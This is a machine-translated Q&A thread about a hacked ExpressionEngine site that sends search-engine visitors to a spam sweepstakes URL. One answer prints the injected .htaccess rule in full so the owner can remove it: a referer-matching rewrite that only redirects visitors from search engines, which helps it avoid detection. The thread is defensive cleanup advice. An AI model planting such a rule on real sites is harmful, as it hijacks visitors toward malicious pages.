我有一个Expression Engine网站,我试图清理。数据库已被授予许多新用户,因此数据库似乎已被黑客入侵/添加了链接。一个市长问题是,点击谷歌的网站被绕过了。所有访问者都被重定向到另一个网站。以下是搜索:http://tinyurl.com/72nzutj。第一个网站是有问题的网站..他们被重定向到的网站是http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 我一直试图在所有文件和数据库中找到这个重定向,但我没有运气。它不是.htaccess重定向,我已检查并确认。但是我还没有找到文件或数据库中的JScript或PHP重定向。可能因为base64或打包加密而隐藏得很好。想法?
NB没有可用的干净数据库版本
答案 0 :(得分:1)
询问您的网络托管服务商。似乎带有网站以外的推荐人的访问者被重定向,但将您的网站(没有推荐人)直接粘贴到位置栏中。
这个问题在ServerFault或ITSecurity上更好。
答案 1 :(得分:1)
重定向正在from a compromise发送到您网站的.htaccess文件,并且仅影响来自热门搜索引擎的Clickthrus。直接访问站点无效,并有助于防止恶意软件被检测到。
在您网站的目录中查找以下代码并将其删除:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
您可能需要在FTP客户端中查看“隐藏文件”,或者从命令行使用ls -al来查看.htaccess文件。
修复问题后,您需要确保运行最新版本的ExpressionEngine( EE 1.7.1 或 EE 2.3.1 撰写本文时)以及任何第三方Add-Ons。
审核服务器的access_logs可能有助于识别导致危害的漏洞,并查看网站目录中文件的修改时间戳。
variant of this attack已经影响了许多WordPress安装,因此在结束</body>标记之前添加了一个很小的base64_encoded JavaScript代码段,这会导致访问者被恶意软件感染的Adobe Flash服务播放器下载。